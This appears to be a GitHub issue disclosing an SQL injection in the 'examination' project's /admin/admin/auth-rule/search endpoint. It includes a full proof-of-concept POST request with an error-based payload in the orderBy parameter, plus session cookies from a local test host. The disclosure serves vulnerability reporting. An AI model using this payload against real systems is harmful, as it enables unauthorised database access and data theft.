examination icon indicating copy to clipboard operation
examination copied to clipboard

Published 20 hours ago verified publisher icon myloveGy

/admin/admin/auth-rule/search has sql injection vulnerability

Open qbz95aaa opened this issue 1 year ago • 0 comments

Vulnerability Product:examination Vulnerability type:sql injection Vulnerability Details: /admin/admin/auth-rule/search URL /admin/admin/auth-rule/search

poc

POST /admin/admin/auth-rule/search HTTP/1.1
Host: 192.168.3.129:8092
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 796
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: ace_settings=%7B%22sidebar-collapsed%22%3A-1%7D; Hm_lvt_d3b3b1b968a56124689d1366adeacf8f=1678157952; Hm_lpvt_d3b3b1b968a56124689d1366adeacf8f=1678169014; PHPSESSID=s0dfimdr2smjmr3074qpav8po2; _admin=90cb44057f6077d07dc09f747754e4ea1023f1d289f128c441138467bbf77bb3a%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22_admin%22%3Bi%3A1%3Bs%3A46%3A%22%5B1%2C%22tGaaJtNH3SXtUEJtA6LIgNb0LQPEjste%22%2C2592000%5D%22%3B%7D; _csrf=d2ae05f533b7d5d759466c965771950e3a44d9703c618e14b02f805ca2430034a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%222YAZrBa_nRKs7CoKBIVaKhRQvAAV1_Up%22%3B%7D
Origin: http://192.168.3.129:8092
Referer: http://192.168.3.129:8092/admin/admin/auth-rule/index
X-Csrf-Token: E8EIH3HxmQ-MC3ECQZ8x4aWKPzeKIosEN3GbrrC4H7QhmElFA7P4UOJZOnF23F6q58NpVsFK2VVBMNr4gedKxA==
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

bRegex=false&bRegex_0=false&bRegex_1=false&bRegex_2=false&bRegex_3=false&bRegex_4=false&bRegex_5=false&bRegex_6=false&bSearchable_0=true&bSearchable_1=true&bSearchable_2=true&bSearchable_3=true&bSearchable_4=true&bSearchable_5=true&bSearchable_6=true&bSortable_0=false&bSortable_1=true&bSortable_2=true&bSortable_3=false&bSortable_4=true&bSortable_5=true&bSortable_6=false&iColumns=7&iDisplayLength=10&iDisplayStart=0&iSortCol_0=1&iSortingCols=1&mDataProp_0=&mDataProp_1=name&mDataProp_2=name&mDataProp_3=data&mDataProp_4=created_at&mDataProp_5=updated_at&mDataProp_6=&params%5BorderBy%5D=extractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281547903184%29%29%29&sColumns=%2C%2C%2C%2C%2C%2C&sEcho=1&sSearch=&sSearch_0=&sSearch_1=&sSearch_2=&sSearch_3=&sSearch_4=&sSearch_5=&sSearch_6=&sSortDir_0=desc
image

qbz95aaa avatar Mar 08 '23 03:03 qbz95aaa